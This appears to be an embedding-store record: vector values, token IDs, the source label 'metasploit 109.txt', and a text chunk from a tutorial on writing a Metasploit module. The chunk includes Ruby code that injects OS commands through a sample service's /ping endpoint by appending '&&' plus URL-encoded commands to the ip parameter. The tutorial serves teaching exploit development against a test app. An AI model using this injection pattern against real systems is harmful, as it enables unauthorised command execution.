0.2247696816921234, 0.404679536819458, 0.1959950178861618, -0.3222440779209137, 0.8703637719154358, -0.5442085862159729, -0.5958437919616699, -0.16907335817813873, -0.6771510243415833, 0.04199200123548508, -0.1910431683063507, 0.11348985880613327, 0.8625236749649048, -0.4764587879180908, -0.6054428815841675, -0.3139975666999817, -0.22545257210731506, 0.3831004798412323, 0.7116783261299133, -0.3063434958457947, 0.25858092308044434, 0.14016270637512207, 0.03617391362786293, 0.7304018139839172, -1.1815376281738281, -0.048494406044483185, 0.31092655658721924, 0.36281731724739075, 1.2879680395126343, 0.6036816835403442, 0.20017173886299133, -0.4680996239185333, -0.07106344401836395, -0.019901217892766, 0.2495044320821762, -0.5107470154762268, -0.9736462235450745, 0.8020102977752686, -0.3719339370727539, -0.48469865322113037, 0.013971902430057526, -0.6942325234413147, 0.550233781337738, -0.14646993577480316, 0.33298149704933167, -0.2859938442707062, 0.6178024411201477, -0.23219145834445953, 0.3438393175601959, -0.5813636183738708, -0.0022074407897889614, -0.4884371757507324, -0.747994601726532, -0.6222023367881775, 0.138393834233284, 0.6176165342330933, -0.508124828338623, -0.019883254542946815, -0.11599606275558472, 1.5220410823822021, 0.7290246486663818, -0.7761674523353577, 0.16254840791225433, 0.3081533908843994, 0.1140165627002716, -1.2676140069961548, 0.42246320843696594, 0.6525869369506836, 0.413722425699234, 0.09309377521276474, 0.043552398681640625, -0.1611262410879135, -0.5939617156982422, 0.1342075765132904, -0.45313361287117004, 0.09222343564033508, 0.4840346574783325, -0.3202369809150696, 0.32877546548843384, 0.7129815816879272, -0.1039058044552803, -1.1719247102737427, 0.4176427125930786, -0.23386049270629883, -0.8869077563285828, -1.0679186582565308, 0.17644451558589935, -0.3897751569747925, 0.3442333936691284, -0.5180071592330933, -0.008127201348543167, 0.765947699546814, 0.773863673210144, -0.1682942807674408, 0.612734854221344, 0.8393266201019287, -0.09723413735628128, -0.3642714321613312, 0.232026144862175, 0.18460480868816376, 0.01953158900141716, -0.8432366251945496, 0.26934462785720825, 0.04414963722229004, 0.24412843585014343, 0.40783968567848206, 0.3898676633834839, 0.34928518533706665, -0.049503959715366364, -0.035306353121995926, -0.5224260091781616, -0.0796016976237297, 0.8225921392440796, -0.4152338206768036, 0.03651713207364082, -0.22293493151664734, 0.32354387640953064, 0.08815337717533112, 0.7542310357093811, 0.03877020254731178, -0.7985568046569824, 0.5553118586540222, 0.8026817440986633, 0.09612332284450531, 0.09000533074140549, 0.3268088698387146, 1.1400401592254639, 0.718208909034729, 0.6050013303756714, 0.7143328189849854, 0.5148379802703857, 0.3668030798435211, -0.1376708298921585, 0.5954309701919556, 0.2018616795539856, -0.42603498697280884, 1.2316421270370483, 0.5316884517669678, -0.35976797342300415, -0.7811683416366577, -0.5130144357681274, 0.12644079327583313, 0.6261079907417297, -0.7437548637390137, -0.6572651863098145, 0.00980022270232439, -0.39142870903015137, -0.43054261803627014, -0.5130698680877686, -0.2033267617225647, 0.5946937799453735, -0.7619950175285339, 0.32483112812042236, -0.19880802929401398, -0.015760887414216995, -0.43785908818244934, -0.05555200204253197, -0.8152039051055908, -0.43089058995246887, -0.6839736700057983, 0.1609894335269928, -0.322713166475296, -0.1286642998456955, 0.40993532538414, -0.4402516782283783, -0.8517358303070068, 0.2529889941215515, 0.5682186484336853, 0.8082020878791809, 0.07386910170316696, -0.7339898943901062, -0.8547652363777161, 0.2134179174900055, -0.32332611083984375, 0.9157420992851257, -0.7451158761978149, -0.28910183906555176, -0.06187429279088974, -0.22857366502285004, 0.1752728670835495, -0.16366684436798096, 0.889941930770874, 0.019700270146131516, -0.24176596105098724, 0.2985455095767975, 0.14747264981269836, -0.12294994294643402, 0.7636699676513672, 0.21132250130176544, -0.11767499148845673, 0.737636387348175, -0.4905794560909271, 0.32147619128227234, 0.541668176651001, 0.14244942367076874, -0.7213399410247803, 0.9136547446250916, -0.1349882334470749, 0.7103538513183594, -0.5302374958992004, 0.5008383989334106, 0.33003345131874084, -0.24875226616859436, 0.17661242187023163, -0.340837687253952, 0.4344763457775116, -0.4048846662044525, -0.21262259781360626, -0.14432686567306519, -0.3094175159931183, 0.24179181456565857, 0.06419466435909271, -0.7782161235809326, 0.12276707589626312, -0.05595172941684723, -0.21754591166973114, 0.01979498378932476, 0.09382394701242447, 1.0504144430160522, -0.5132354497909546, 0.29363876581192017, -0.9236083626747131, -0.2307407706975937, -0.005825914442539215, 0.185158833861351, 0.19078746438026428, -0.9261203408241272, 0.8500771522521973, -0.0374940000474453, -0.48780620098114014, 0.47898122668266296, 0.39460524916648865, -0.3551827669143677, -0.25730282068252563, -0.2673744261264801, 0.12433158606290817, 0.5560523867607117, 0.144629567861557, 0.7957803010940552, -0.01057724840939045, 0.7318292856216431, -0.3192674219608307, -0.13993524014949799, 0.606365442276001, 0.02101891301572323, 0.18049582839012146, 0.08978252857923508, -0.20828963816165924, 0.2785659432411194, -0.671347975730896, -0.5383365750312805, -0.17941518127918243, 0.4061819314956665, 0.3786105513572693, -0.43993017077445984, 0.6646938323974609, -0.4870899021625519, -0.32320722937583923, 0.4217211604118347, -0.02266424149274826, -0.3308441638946533, 0.6797146797180176, 0.6164384484291077, 0.38605213165283203, -0.7600249648094177, -0.0432308167219162, 0.1989196538925171, 0.050537604838609695, 0.26233574748039246, -0.05111962929368019, -0.17569123208522797, 0.02021760493516922, -0.33183416724205017, -0.1531219184398651, -0.6117173433303833, -0.2689323127269745, -0.030254919081926346, 0.19637730717658997, -0.5108727216720581, -0.7583330869674683, -0.7890791893005371, 0.7828022241592407, 1.3127015829086304, 0.7046834230422974, 1.1791054010391235, 0.3392168879508972, -0.10827641189098358, -0.30032843351364136, 0.31979900598526, -0.23255854845046997, 0.0949966162443161, -0.3522461950778961, 1.0153392553329468, -0.17028872668743134, 0.4036038815975189, 0.1316027045249939, -0.0823814794421196, 0.38763222098350525, -0.015307076275348663, -0.45960405468940735, -0.3719671964645386, -0.3705959618091583, -0.14514967799186707, 0.6715911030769348, -0.49997833371162415, -0.39028340578079224, -0.4898437261581421, 0.10314685106277466, 0.5116731524467468, 0.26661407947540283, -0.9734113812446594, -0.11143319308757782, -0.7287002801895142, 0.15202607214450836, 0.03387941047549248, -0.44763699173927307, -0.1822083741426468, -1.1332706212997437, -0.55698162317276, -1.140014410018921, 0.4912485182285309, 0.4398665726184845, -0.28792083263397217, -0.23661953210830688, -0.6114463806152344, -0.2283659130334854, -0.015153956599533558, -0.576604962348938, -0.39310452342033386, -0.5306139588356018, 0.1404210925102234, 0.36901721358299255, 0.5711215734481812, -0.452227383852005, -0.7252153754234314, 0.30892518162727356, -0.04870776832103729, 0.5441132187843323, -1.0315557718276978, 0.980866551399231, 0.4537312984466553, -0.21832920610904694, -0.25046470761299133, 0.16535188257694244, -0.6267018914222717, -0.2705898880958557, -0.4781160354614258, -0.1467781960964203, -0.6853287220001221, -0.12563103437423706, 1.0342020988464355, -0.29471930861473083, -0.37219667434692383, 0.44577452540397644, 0.3383057117462158, -0.10863945633172989, -0.017652221024036407, -0.2029302567243576, -0.05356549471616745, 0.07255386561155319, -0.5436972379684448, 0.9519808292388916, 0.2068697214126587, 0.053205542266368866, -0.07871657609939575, -0.6326355338096619, 0.7852624654769897, -0.04184087738394737, 0.7294492721557617, -1.061379075050354, -0.5464674830436707, 0.3310777246952057, 0.4829247295856476, 0.03664586693048477, 0.4870729446411133, 0.07000461220741272, -0.17378747463226318, -0.05571678653359413, -0.11118095368146896, -0.8739391565322876, -0.8718580007553101, 0.16040340065956116, -0.48830586671829224, -0.20948070287704468, -0.23944909870624542, 0.6551108360290527, -0.4518605172634125, -0.28635266423225403, 0.13048698008060455, -0.47665444016456604, -0.08942195773124695, -0.4174686074256897, -0.3120306730270386, -0.7171975374221802, 0.34370285272598267, 0.01784166507422924, 0.014752313494682312, -0.6308558583259583, 0.5624815225601196, -0.05964558944106102, 0.16403476893901825, 0.513798177242279, -0.7092746496200562, -0.11368633061647415, 0.6744698882102966, -0.07057144492864609, -0.43264642357826233, 0.33235087990760803, 0.48075515031814575, -0.5289796590805054, 0.36325597763061523, 0.12456026673316956, -0.518929123878479, -1.0368963479995728, -1.1461042165756226, 0.3911302387714386, -0.067536860704422, -0.3043834865093231, -0.906356930732727, -0.7441205978393555, -0.4225490391254425, 0.1954716295003891, 0.2858647108078003, -1.287189245223999, 0.06221657618880272, -0.10421885550022125, -0.07025603204965591, -0.5022780299186707, 0.1770663559436798, -0.3697825074195862, -1.0285974740982056, -0.29141005873680115, 1.1414813995361328, 0.12707893550395966, 0.055577583611011505, -0.022954266518354416, 0.283419132232666, -0.017444422468543053, 0.7331499457359314, -0.49023866653442383, -0.3823048770427704, -0.14093337953090668, -0.34763240814208984, 0.027140963822603226, 0.8234274387359619, -0.284853458404541, 0.6906141638755798, -0.15011323988437653, 0.6086007356643677, -0.05955258384346962, -0.18880799412727356, -0.36437687277793884, 0.38611677289009094, 0.8394590020179749, -0.33077338337898254, 0.4070231020450592, -0.39749643206596375, 0.6500662565231323, 0.2514472007751465, -0.4822179973125458, -0.20247401297092438, 0.3996697962284088, -0.46943438053131104, -1.313042402267456, 1.1216446161270142, 0.017318246886134148, -0.3534086346626282, 0.3677263855934143, -0.1816941499710083, 0.9286093711853027, -0.9307659268379211, 0.047275032848119736, 1.3608834743499756, 0.3377620279788971, 0.20708158612251282, -0.5108113884925842, 0.5506353974342346, 0.2748400866985321, 0.04033705219626427, 0.45612025260925293, 0.1987629234790802, 0.188407763838768, -0.4591229557991028, -0.5075695514678955, -0.3037618100643158, -0.2956245243549347, -0.516939103603363, 0.2277933806180954, 0.005990320350974798, 0.2095758616924286, -0.5357118248939514, -0.4750243127346039, -0.09867877513170242, 0.09933087229728699, 0.1230238601565361, -0.4106022119522095, -0.13536480069160461, 0.6288979053497314, 0.4315965473651886, -0.8941119909286499, 0.394676148891449, -0.8284540772438049, 0.2899438440799713, 0.9759696125984192, 0.5200420022010803, -0.6544644832611084, 0.555999755859375, 0.5724049806594849, -1.067980408668518, -0.2925357520580292, -0.9817234873771667, 0.13152720034122467, -0.23142626881599426, -0.9291879534721375, -0.3235931694507599, 0.3548735976219177, -0.00818423181772232, 0.48274511098861694, 0.5087234377861023, -0.20255044102668762, 0.09593933075666428, -0.5344023704528809, -0.4243409335613251, 0.5778213739395142, 0.6725254058837891, 0.5934580564498901, -0.5307307839393616, -0.5108683109283447, -0.7066760659217834, -0.542613685131073, 0.3450983166694641, 0.40669938921928406, 0.713623583316803, 0.17108529806137085, 0.3518078029155731, 0.2130306214094162, 0.22720512747764587, 0.841404378414154, -0.14462850987911224, 0.6845518946647644, 0.6229835152626038, -0.14454180002212524, -0.8399293422698975, -0.6515769362449646, -0.14590421319007874, -0.2518020272254944, 0.37530800700187683, 0.15074372291564941, -0.3132806122303009, -0.02661418914794922, 0.04965933784842491, 0.37245431542396545, -0.9035576581954956, -0.6790993213653564, -1.0352978706359863, -0.10134764760732651, 0.4187435209751129, -0.08934169262647629, 0.21574164927005768, 0.04692980647087097, -0.0448942631483078, -0.10238523781299591, -0.6230371594429016, 0.39484354853630066, 0.2080075442790985, -0.12527793645858765, -0.41228410601615906, 0.4990610182285309, -0.5242050290107727, -0.4005855917930603, -0.34086403250694275, -0.03716382756829262, -0.7544074058532715, -1.1323566436767578, 0.11100038886070251, 0.47363415360450745, -0.7081431150436401, 0.5736057758331299, -0.4825063943862915, 0.11606582999229431, 0.20182190835475922, -0.5405698418617249, 0.6614984273910522, 0.3627793788909912, -0.769779622554779, 0.5205057859420776, 0.06993385404348373, -0.3041893243789673, 0.34549927711486816, -0.5535056591033936, 0.4112410843372345, -0.06874589622020721, 0.4087960124015808, 0.4131128191947937, 0.0776422768831253, -0.7586143612861633, 0.1609942764043808, -0.30627408623695374, -0.8613407611846924, 0.07368868589401245, -0.8797398805618286, -0.13111034035682678, 0.5188285112380981, -0.19353815913200378, 0.08722677826881409, 1.0236051082611084, 0.5297923684120178, 0.10874143242835999, 0.037561215460300446, 0.614637553691864, 0.7492954134941101, -0.008070630021393299, 0.10818740725517273, 0.370684415102005, -0.03335436061024666, -0.13580729067325592, -0.020561961457133293, 0.1823301464319229, -0.21099908649921417, 0.16197872161865234, -0.3380030393600464, 0.09997600317001343, -0.10343249142169952, 0.1188475713133812, -0.11181360483169556, 0.3201823830604553, -0.18612249195575714, -0.06579358875751495, 0.5477585792541504, -0.6326631903648376, -0.7574183940887451, 0.005872572306543589, -0.7986549139022827, 0.46080833673477173, -0.2518956959247589, -0.46586430072784424, -0.15355370938777924, -0.07984431087970734, -0.24137292802333832, -0.3940281569957733, -0.2510736584663391, 0.09833837300539017, 0.3692706227302551, -0.11526452749967575, 0.26438677310943604, 1.092562198638916, -0.6426842212677002, -0.6725976467132568, -0.14623291790485382, 0.39691245555877686, -0.8039483428001404, -0.9796608090400696, 0.5973456501960754, 0.8801073431968689, 0.5413496494293213, -0.2828824818134308, -0.5820170640945435, -0.32879146933555603, 0.29027411341667175, 0.6687341928482056, -0.3624427616596222, 0.24338828027248383, -0.277668297290802, 0.23609191179275513, -0.2610647678375244, 0.12538860738277435, -0.007756460923701525, -0.21146978437900543, 0.25489485263824463, 0.0961596667766571, -0.33404049277305603, 0.9219182133674622, -0.11644591391086578, 0.19371062517166138, 0.8136968016624451, 0.5525768995285034, 0.7599383592605591, -0.6027113199234009, 0.19754227995872498, -0.2757810056209564, 0.4752119481563568, 0.6044061183929443, 0.45267459750175476, -0.202628031373024, 0.4839920997619629, 0.39525243639945984, -1.1372954845428467, -0.390391081571579, 0.28032737970352173, 0.012000036425888538, -0.21290026605129242, -0.17140033841133118, -0.43575721979141235, -0.14771230518817902, -0.6636868119239807, -0.29341715574264526, 0.4341234862804413, 0.013132746331393719, 0.1429564207792282, -0.060774676501750946, -0.5307854413986206, 1.1539227962493896, -0.7091641426086426, 0.1689138561487198, 0.3333966135978699, 0.3641355335712433, 0.6774399280548096, 0.13155806064605713, -1.049907922744751, 0.3827633857727051, 1.265735149383545, 0.531051754951477, -0.7725774645805359, 0.022395983338356018, -0.061543095856904984, 0.3889419734477997, -0.09641896933317184, -0.15898290276527405, -0.9533061385154724, 0.536974310874939, -0.2276872992515564, -0.6994668245315552, -0.7735719680786133, 0.4199858605861664, 0.2792394161224365, 0.48341628909111023, 0.058146849274635315, 0.183145672082901, 0.720681369304657, -0.49641063809394836, 0.5125279426574707, -0.33183977007865906, 0.20724397897720337, 0.3247584402561188, -0.15479883551597595, -0.6459503173828125, 1.1985375881195068, 0.287757009267807, 0.3621591627597809, 0.0182841457426548, 1.3793940544128418, 0.2304263859987259, 0.09765729308128357, 0.25485771894454956, -0.5193803310394287, -0.10047468543052673, 0.15554939210414886, -0.01908784732222557, -0.4015250504016876, 0.46130692958831787, -0.223944291472435, 0.8664798140525818, -0.05560249462723732, -0.32443439960479736, -0.4285484850406647, 0.21547089517116547, -0.8257997035980225, -0.43238991498947144, 0.6878464818000793, -0.1509000062942505, -0.7761046290397644, 0.028267856687307358, 0.6650866866111755, 0.1885567605495453, 0.572981059551239, -0.39344164729118347, -0.7372788786888123, -0.49775075912475586, 0.09447946399450302, -0.4520489275455475, 0.6188955903053284, -0.32775768637657166, 0.02588026225566864, -0.2536686062812805, -0.5079178810119629, -0.016016539186239243, 0.07747961580753326, -0.3548107147216797, -0.17338283360004425, 0.5297572016716003, 0.36347731947898865, 0.9308221936225891, 0.05011770501732826, -0.30600008368492126, -0.2171458750963211, 0.1445799171924591, 0.7838442921638489, -0.03662519529461861, 0.7278594970703125, 0.30772027373313904, 0.3393043279647827, 0.189497172832489, -0.2650878429412842, 0.4565373361110687, -0.08484330028295517, -0.07481629401445389, -0.19562280178070068, -0.24008014798164368, -0.7328155040740967, -0.5316240787506104, 0.06973318010568619, -0.10923758149147034, 0.27922362089157104, 0.18536117672920227, -1.187120795249939, -0.18865610659122467, -0.6640289425849915, -0.39890962839126587, -0.2333439737558365, 0.08862187713384628, -0.007330241613090038, -0.46300795674324036, 0.5998849272727966, -0.9277198314666748, 4.332005500793457, 0.00746195251122117, -0.0903388038277626, -0.03897703066468239, 0.07559816539287567, 0.5881230235099792, 0.9157118797302246, -0.48715803027153015, 0.8692018985748291, -0.6700320243835449, 0.3684057891368866, -0.4380754828453064, 0.5191299915313721, 0.5892237424850464, 0.7143781185150146, 0.2569323182106018, -0.8021140098571777, 0.022166704759001732, -0.013551253825426102, -0.9085832834243774, -1.026004672050476, -0.22088393568992615, -0.20371659100055695, 1.0262784957885742, 0.2711644470691681, -0.026892706751823425, 0.007114604581147432, -0.9479874968528748, 0.25931450724601746, -0.18575991690158844, -0.04806790500879288, -0.2937364876270294, -0.021481217816472054, -0.3712204098701477, -0.47132354974746704, -0.11108911782503128, -0.15858696401119232, -0.6454535126686096, -0.639448344707489, -0.2599989175796509, 0.7396062016487122, 0.3353100121021271, 0.061650339514017105, 0.0711912289261818, 0.5525673031806946, 0.7697166204452515, -0.46702706813812256, 0.47453972697257996, 0.7279114127159119, -0.7745983600616455, 0.2936643660068512, 0.23365730047225952, 0.8339204788208008, -0.015513823367655277, -0.6730892062187195, 0.6299452781677246, -0.13858340680599213, -0.1644195169210434, 0.2234957218170166, -0.1495639979839325, 0.08700843900442123, -0.4750928282737732, 0.34404119849205017, 0.26010626554489136, -0.3136310577392578, 0.5309738516807556, 0.02073470689356327, -0.07519660145044327, 0.10678929090499878, -0.003965896554291248, -0.19819512963294983, 0.01988488994538784, -0.5749601125717163, -0.302416056394577, 0.33956897258758545, -0.27219071984291077, 0.06594211608171463, 0.32647305727005005, 0.8158491253852844, -0.25119659304618835, -0.33167073130607605, -0.9337379336357117, -1.0645555257797241, 0.24697424471378326, 0.3823954463005066, -0.06366634368896484, -0.21991145610809326, -1.0929280519485474, 0.22766123712062836, -0.04938502237200737, -0.009316105395555496, 0.4789719879627228, -0.22159123420715332, 0.7674539089202881, 0.3923057019710541 ]
[ 4057, 2391, 2011, 29226, 1996, 8946, 2121, 1011, 17202, 5371, 29278, 5604, 1010, 1996, 25551, 2518, 2000, 2079, 2003, 1996, 21304, 1012, 2017, 2064, 2424, 18804, 13102, 4135, 4183, 1521, 1055, 18077, 14176, 1010, 6100, 1037, 5371, 1010, 14916, 14074, 2009, 1010, 1998, 2175, 2013, 2045, 1012, 1037, 5806, 1997, 1037, 11336, 10760, 5806, 1997, 1037, 11336, 2008, 4076, 1996, 2682, 4289, 2003, 2242, 2066, 2023, 1024, 2465, 18804, 13102, 4135, 4183, 5302, 8566, 2571, 1026, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 4635, 1027, 2204, 26763, 2075, 2421, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 1024, 1024, 8299, 20464, 11638, 13366, 3988, 4697, 1006, 18558, 1027, 1063, 1065, 1007, 1001, 4064, 2005, 2085, 2203, 13366, 11307, 1035, 2919, 1035, 25869, 2015, 1006, 4642, 2094, 1007, 1001, 4064, 2005, 2085, 2203, 13366, 15389, 1035, 3094, 1006, 4642, 2094, 1010, 1035, 23569, 2015, 1027, 1063, 1065, 1007, 1001, 4064, 2005, 2085, 2203, 13366, 18077, 1001, 4064, 2005, 2085, 2203, 2203, 2023, 4472, 2296, 6827, 2391, 2013, 1996, 3252, 1997, 1037, 11336, 1010, 2348, 2009, 2180, 1521, 1056, 2448, 2664, 1012, 3988, 4697, 10760, 3988, 4697, 4118, 2003, 2109, 2000, 9375, 1998, 3413, 27425, 1012, 2296, 3988, 4697, 4118, 1999, 1996, 18804, 13102, 4135, 4183, 1011, 7705, 3642, 15058, 4076, 1996, 4289, 1997, 2019, 4064, 18558, 2108, 2979, 2046, 10651, 1035, 18558, 1010, 2029, 4152, 2979, 2000, 1996, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 3988, 4697, 4118, 1024, 13366, 3988, 4697, 1006, 18558, 1027, 1063, 1065, 1007, 3565, 1006, 10651, 1035, 18558, 1006, 18558, 1010, 1001, 2182, 2003, 2073, 1996, 27425, 3632, 1005, 2171, 1005, 1027, 1028, 1005, 3094, 13341, 2114, 1037, 3231, 17852, 2203, 8400, 1005, 1010, 1005, 6412, 1005, 1027, 1028, 1005, 2023, 20397, 1037, 3094, 13341, 18130, 2114, 1037, 3231, 4646, 1005, 1010, 1005, 6105, 1005, 1027, 1028, 5796, 2546, 1035, 6105, 1010, 1005, 3166, 1005, 1027, 1028, 1005, 2115, 2171, 1005, 1010, 1005, 7604, 1005, 1027, 1028, 1031, 1031, 1005, 24471, 2140, 1005, 1010, 1005, 16770, 1024, 1013, 1013, 18804, 13102, 4135, 4183, 1012, 4012, 1013, 1005, 1033, 1033, 1010, 1005, 19380, 13701, 1005, 1027, 1028, 1005, 16798, 2509, 1011, 5511, 1011, 5840, 1005, 1010, 1005, 4132, 1005, 1027, 1028, 1005, 11603, 1005, 1010, 1001, 2109, 2005, 12515, 21778, 1011, 2065, 2017, 1005, 2128, 2725, 3642, 13341, 1010, 2023, 2089, 2022, 1996, 2653, 1997, 1996, 4773, 29098, 1005, 7889, 1005, 1027, 1028, 1031, 1005, 19998, 3094, 1005, 1010, 1063, 1005, 4132, 1005, 1027, 1028, 1031, 1005, 11603, 1005, 1010, 1005, 19998, 1005, 1033, 1010, 1001, 11603, 1998, 19998, 2031, 2367, 4642, 2094, 18093, 2015, 1010, 2023, 3957, 2017, 2062, 7047, 1005, 7905, 1005, 1027, 1028, 7905, 1035, 4642, 2094, 1010, 1005, 2828, 1005, 1027, 1028, 1024, 19998, 1035, 4642, 2094, 1010, 1001, 2770, 1037, 3094, 1011, 2023, 2052, 2022, 1036, 1024, 11603, 1035, 4530, 4842, 1036, 2005, 1037, 4642, 5104, 26702, 2099, 4530, 4842, 1005, 12398, 7361, 9285, 1005, 1027, 1028, 1063, 1005, 18093, 1005, 1027, 1028, 1005, 4642, 2094, 1013, 19998, 1013, 7901, 1035, 24234, 1005, 1010, 1005, 1054, 6442, 1005, 1027, 1028, 5385, 2692 ]
metasploit
109.txt
2
, } } ],'payload'= > {'badchars'= >'\ x00 ', }'notes'= > { # required for new modules url'stability'= > [ crash _ safe ],'reliability'= > [ repeatable _ session ],'sideeffects'= > [ ioc _ in _ logs ] } # some more metadata options are here : url ) ) end all that this method does is register metadata to the module. filteringit ’ s important to ensure that payloads being sent are properly encoded. as an example, if you send a request to the / ping endpoint that looks like / ping? ip = 1. 1. 1. 1 & & id, you won ’ t see the β€œ uid = 1000 ( meta ) gid = 1000 ( meta ) ” in the response because & is a special character in http. encoding requirements might change based on the application you ’ re trying to inject, so experiment if things aren ’ t working. def filter _ bad _ chars ( cmd ) return cmd. gsub ( / & /,'% 26'). gsub ( / /,'% 20') end filter _ bad _ chars takes in cmd, which is a string. cmd has two substitutions applied - the first will translate & to % 26, the second translates a space to % 20. the. gsub statements are a global substitution across the string, so the entire payload is impacted by the substitutions here ( similar to str. replace in python ). regardless of whether or not the string is modified, it is returned. executionthe execute _ command method takes in cmd and _ opts and executes the command on the target. in our case, executing a command is simply adding the command to a get request and sending it to the / ping endpoint on our sample service. def execute _ command ( cmd, _ opts = { } ) send _ request _ cgi ( {'method'= >'get ','uri'= >'/ ping ','encode _ params'= > false,'vars _ get'= > {'ip'= > " bing. com % 20 % 26 % 26 % 20 # { filter _ bad _ chars ( cmd ) } ", } } ) end we don ’ t even need to handle the output of send _ request _ cgi (
[ 0.28208547830581665, -0.2141558974981308, -0.23795536160469055, 0.973393976688385, -0.09050539880990982, 0.3058079481124878, -0.08453817665576935, 0.06246597319841385, 0.33210742473602295, 1.104886770248413, 0.2781960070133209, 0.6501942873001099, 0.21175210177898407, -0.2414735108613968, -0.5163604021072388, -0.02648705057799816, -0.22927813231945038, 0.30057957768440247, -1.005385398864746, -0.22018885612487793, -0.12457691133022308, 0.03344093635678291, -0.6979946494102478, -0.8512508869171143, -0.5843268036842346, 0.289554238319397, 0.21381039917469025, 0.3602101504802704, 0.2114187628030777, 0.7876800298690796, -0.058996059000492096, 0.4724651277065277, 0.12337037920951843, -1.0762337446212769, 0.3176536560058594, -0.3347533643245697, 0.8576280474662781, -0.2581091523170471, -0.14105531573295593, -0.4209808111190796, 0.5250490307807922, -0.15778003633022308, 0.1857464611530304, -0.514885663986206, -1.1641024351119995, -0.15458722412586212, 0.284444123506546, -0.1380862146615982, 0.22385312616825104, -0.09682685136795044, 0.38166382908821106, 0.6165050864219666, 0.046571750193834305, 0.33788740634918213, -0.2010185718536377, 0.27220821380615234, -0.3095870614051819, -0.330837219953537, -0.3455662429332733, 0.4279855489730835, -0.6780298948287964, 0.013413873501121998, 0.22229395806789398, -0.7918357849121094, -0.17008854448795319, -0.19461077451705933, 0.31862398982048035, 0.020333416759967804, -0.06496502459049225, -0.6203343868255615, -0.12582573294639587, 0.8370956182479858, -0.546284019947052, -0.41929978132247925, -0.4864935576915741, 0.23043952882289886, -0.37385669350624084, -0.32258015871047974, -0.36015772819519043, 0.552085280418396, 0.23688353598117828, 0.5618945360183716, 0.4522898495197296, -0.2648478150367737, 0.2757759988307953, -0.48207876086235046, 0.6781309843063354, 0.87917560338974, -0.22156167030334473, 0.34456127882003784, 0.6404792070388794, 0.6835054755210876, -0.6832731366157532, -0.33556634187698364, 0.1577601283788681, 0.6944591999053955, -0.3727498948574066, 0.40501371026039124, 0.6355513334274292, -0.33478209376335144, 1.060290813446045, 0.6685135960578918, 0.793310821056366, 0.6163515448570251, -0.14800812304019928, 0.8597726821899414, 0.46998342871665955, 0.10012698173522949, -1.44760000705719, -0.2051055133342743, 0.559551477432251, 0.1535632312297821, -0.24678780138492584, -1.0469367504119873, -0.2809085249900818, 0.5885428190231323, 0.5629753470420837, -0.47314709424972534, -0.6718345880508423, 0.6642789840698242, 0.2266806662082672, -0.10877478122711182, 0.4091629087924957, -0.34061798453330994, 0.1992512345314026, -0.07068518549203873, 0.509042501449585, 0.7780909538269043, -0.4564807116985321, -0.24608680605888367, -0.2150927037000656, -0.8004357218742371, 0.10379650443792343, 0.2880346477031708, -0.563660740852356, 0.1999061405658722, 0.20918746292591095, -0.06854691356420517, 0.9844972491264343, -0.6019905209541321, 0.19206170737743378, 0.8971463441848755, 0.5492498874664307, 0.9342373013496399, -0.10014519095420837, -0.07811132818460464, -0.3894132971763611, -0.30818259716033936, -0.29389113187789917, -0.003951074555516243, -0.2114737182855606, 0.07759226113557816, 1.1314398050308228, -0.6919236779212952, -0.6513504981994629, 0.3364933431148529, 0.145675390958786, 0.9816350340843201, -0.3634122610092163, -0.37810054421424866, -0.1861061006784439, 0.8073511719703674, -0.13331621885299683, 0.07968836277723312, -0.12606319785118103, 0.7188675999641418, -0.7427622675895691, -0.4166801869869232, -0.8402172923088074, 0.17511850595474243, 0.5349718332290649, 0.22246018052101135, 0.2196386605501175, 0.4636510908603668, 1.6108980178833008, 1.0634853839874268, -0.12269338220357895, 0.7712082862854004, 0.2506118416786194, 0.42988306283950806, -0.8348064422607422, 0.25320619344711304, 0.12501884996891022, 0.5996167063713074, 0.4212872385978699, 0.38236382603645325, 0.16694584488868713, -0.9660134315490723, 0.01736314967274666, -0.22630059719085693, -0.22903431951999664, 0.47884637117385864, 0.3158114552497864, 1.1218349933624268, 0.5961885452270508, -0.04244646802544594, -1.0010242462158203, 0.048529136925935745, -0.8007704615592957, -0.9219794273376465, -0.4149779677391052, 0.11793752014636993, -0.44477561116218567, 0.20254215598106384, -0.9536374807357788, 0.034286029636859894, 0.8835525512695312, 0.633938193321228, -0.0012692081509158015, 0.9137193560600281, 0.7705408334732056, -0.17405392229557037, -0.31136786937713623, 0.1583857387304306, -0.5371744632720947, 0.1785423308610916, -0.9660666584968567, 0.5227289199829102, -0.25446656346321106, 0.14696505665779114, -0.24536213278770447, 0.5702690482139587, 0.49083736538887024, 0.33505696058273315, 0.3564126789569855, -0.8904546499252319, 0.25152260065078735, -0.06785720586776733, -0.8683265447616577, -0.16332095861434937, -0.07250555604696274, 0.14940285682678223, 0.18145355582237244, 0.8753467798233032, 0.23906786739826202, -0.5788111686706543, 1.1823989152908325, 0.769760012626648, -0.18248246610164642, -0.23752231895923615, 0.07297563552856445, 0.9528980255126953, 0.16085100173950195, 0.03724122419953346, 0.37274840474128723, 0.10795634239912033, -0.204201340675354, -0.26056116819381714, -0.4847579598426819, 0.380019873380661, -0.5393857359886169, 0.6522330641746521, 0.6304677128791809, 0.22258692979812622, -0.8637740612030029, -0.9386287331581116, 0.7058383226394653, 0.6805335283279419, -1.454280972480774, -0.6075807213783264, 0.3033062517642975, -0.1315075308084488, -0.06299591809511185, -0.1264396607875824, -0.1855103224515915, 0.3657999634742737, -0.16219931840896606, 0.4303993880748749, -0.051639363169670105, -0.25379106402397156, -0.5116688013076782, 0.021870899945497513, -0.25712549686431885, -0.06788785010576248, -0.5147042870521545, 0.026881316676735878, -0.1812286078929901, -0.4503527283668518, 0.7789968252182007, -0.22875334322452545, -0.6193459630012512, 0.23359008133411407, 0.32140791416168213, 0.6343631148338318, -0.058929819613695145, -0.2805354595184326, -0.9517254829406738, 0.16489282250404358, -0.03136398643255234, 0.9694798588752747, 0.08163582533597946, -0.6028947234153748, -0.7808965444564819, 0.3979630470275879, -0.11476030945777893, -0.33805951476097107, 1.1437296867370605, 0.05568928271532059, -0.136792853474617, -0.25275036692619324, -0.24056091904640198, -0.4504282474517822, 0.05361932888627052, 0.19217418134212494, -0.46642330288887024, 0.1964738816022873, -0.48494118452072144, 0.015996428206562996, 0.14403215050697327, 1.061833381652832, -0.7839921116828918, 0.5916613936424255, -0.13740994036197662, 0.6360064148902893, -0.7774520516395569, 0.5359150171279907, 0.5541389584541321, -0.10288238525390625, -0.11752697825431824, -0.9398447275161743, 0.08428266644477844, -0.1260349303483963, 0.2568167448043823, -0.4591059982776642, 